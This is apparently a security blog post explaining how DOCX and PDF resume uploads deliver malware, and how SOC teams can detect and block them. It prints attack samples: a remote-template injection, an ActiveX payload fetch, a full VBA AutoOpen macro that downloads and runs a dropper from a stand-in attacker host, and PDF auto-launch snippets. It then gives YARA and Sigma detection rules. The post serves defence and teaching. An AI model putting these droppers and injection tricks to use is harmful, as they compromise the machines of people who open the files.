In a recent application process, I ran into a frustratingly common situation: a company refused to accept .docx uploads due to “security concerns”… but was happy to accept .pdf files instead. Seems smart, right?

It’s not. Let’s break down why both file types have real, exploitable risks — and show exactly how attackers use each to deliver malware — with code, payload examples, and CVE breakdowns.

⚠️ DOCX Files: Dangerous Doesn’t Always Mean Obvious

DOCX is often treated as the “safe” alternative to macro-enabled formats like .docm. That’s a dangerous assumption. While .docx is designed to exclude VBA macro support, attackers have repeatedly found ways to sneak malicious code into these files — and Microsoft confirms that macro viruses can spread through infected Word documents, including .docx.

• 📎 Macro Viruses DO Affect DOCX: Microsoft classifies macro viruses as spreading through Word docs. Macros can be embedded via templates or malformed structures, and even .docx can be coerced into executing them.
• 🧩 Remote Template Injection: A .docx can include a reference to a remote template that contains malicious macros. Example:

<Relationship Id="rId1" 
  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
  Target="http://attacker[.]com/template.dotm" 
  TargetMode="External"/>

When the DOCX is opened, Word attempts to load the external .dotm template. If macros are enabled or user trust is abused, the macro executes.

• 🪓 CVE Example: CVE-2021-40444 – Malicious ActiveX control embedded via crafted XML in a DOCX preview triggered RCE:

<object classid='clsid:...BAD-CLSID...'>
  <param name="URL" value="http://attacker[.]com/payload.cab">
</object>

This vulnerability allowed attackers to execute arbitrary code just by previewing a malicious DOCX file in Windows Explorer — no macro needed.

• 🧨 VBA Macro Payload Sample: Classic malicious macro using VBA to drop a file:

Sub AutoOpen()
  Dim strUrl As String
  strUrl = "http://attacker[.]com/dropper.exe"
  With CreateObject("Microsoft.XMLHTTP")
    .Open "GET", strUrl, False
    .Send
    If .Status = 200 Then
      Dim objStream
      Set objStream = CreateObject("ADODB.Stream")
      objStream.Open
      objStream.Type = 1
      objStream.Write .responseBody
      objStream.SaveToFile "C:\\Users\\Public\\dropper.exe", 2
      objStream.Close
    End If
  End With
  Shell "C:\\Users\\Public\\dropper.exe", vbHide
End Sub

🧨 PDF Files: More Than Meets the Eye

PDF is not a static format. It’s scriptable and programmable — and that’s why it’s dangerous.

• 🦠 JavaScript Execution via /OpenAction: Many malicious PDFs include JavaScript triggers. Example:

/OpenAction <<
/S /JavaScript /JS (app.alert("Your system is infected. Download cleaner now!"))
>>

• 🔗 Embedded Executables: PDFs may include EXEs or scripts using the /Launch action:

/Launch <<
/F (evil.exe)
/D (C:\\Temp)
/O (open)
/S
>>

• 🔬 CVE-2018-4990: Used malformed compressed streams to trigger RCE via heap corruption in Adobe Reader.
• 🧪 pdfid + pdf-parser Output Example:

$ pdfid.py suspicious.pdf
/JavaScript 1
/OpenAction 1
/Launch 1

$ pdf-parser.py suspicious.pdf --search JavaScript
obj 10 0
  <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "evil.exe", nLaunch: 2 });)
  >>

This kind of PDF delivers malware even if it’s disguised as a “secure” form or invoice.

🎯 Real-World SOC Scenario: Resume Dropper Malware

Picture this: your company posts a job opening. Within hours, your HR inbox or web portal is flooded with 500+ applications. But a few of them aren’t just resumes — they’re delivery mechanisms.

Attackers embed malware in DOCX or PDF files to compromise the endpoint that opens the resume — typically HR, hiring managers, or even security analysts in hybrid review roles. This is a classic initial access vector used in phishing, BEC staging, and red team campaigns.

🛠️ What Can SOC Analysts Do?

• 🚩 Flag large surges in resume uploads from unauthenticated or guest sessions
• 🔬 Perform auto-extraction of document metadata and scan attachments with YARA + sandbox detonation
• 📥 Create EDR watchlists for suspicious behaviors linked to office or PDF processing
• 🧰 Monitor for outbound requests to domains linked via embedded templates, JS, or macros

🧾 YARA Rule: Detect Malicious Resume Macros

rule Malicious_Macro_Resume
{
  meta:
    description = "Detects suspicious macros in resume-themed DOCX files"
    author = "SOCDFIR Blog"
    reference = "CVE-2021-40444, macro malware delivery"

  strings:
    $a = "AutoOpen"
    $b = "CreateObject"
    $c = "ADODB.Stream"
    $d = /http[s]?:\/\/[^\s]{10,100}/
    $e = "Shell"

  condition:
    uint16(0) == 0x504B and 3 of ($a,$b,$c,$d,$e)
}

💡 Use this YARA rule in document scanning pipelines or on extracted macro code within `.vbaProject.bin` contents inside .docx/.docm files.

⚡ Sigma Rule: Malicious Office Execution

title: Office App Launches External Script or Executable
id: socdfir-office-launch-exec
description: Detects Office processes spawning suspicious commands, often tied to macro malware
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|contains:
      - 'WINWORD.EXE'
      - 'EXCEL.EXE'
      - 'POWERPNT.EXE'
    Image|endswith:
      - 'cmd.exe'
      - 'powershell.exe'
      - 'wscript.exe'
      - 'mshta.exe'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059

🧠 Tune this Sigma rule to alert when Office spawns unusual child processes — a red flag that a resume was more than just a resume.

🧭 SOC Workflow: Resume File Intake Hardening

• 🚪 Build a sandboxed submission portal for resume intake
• 📤 Strip/flatten document content before internal distribution (CDR, safe HTML conversion)
• 🧾 Store resumes as base64-encoded files until post-scan release
• 💬 Add alert context for HR in ticketing: “File originated from external applicant upload. Open in viewer only.”
• 🔄 Forward suspicious attachments for dynamic analysis (e.g., Cuckoo, Joe Sandbox)

Most importantly, train SOC Tier 1 staff to review resume files like any other attachment in a phishing campaign. The payload doesn’t care whether it came from a fake invoice or a fake job seeker.

🔐 Final Thoughts

DOCX and PDF files are not safe. They are common — which is why attackers love them. If you’re going to ban one, you better understand the risks of the other. Better yet, design your upload process around file behavior, not extension.

Want secure resumes? Accept plaintext, markdown, or properly disarmed formats — and make that clear on your site. Don’t rely on myths.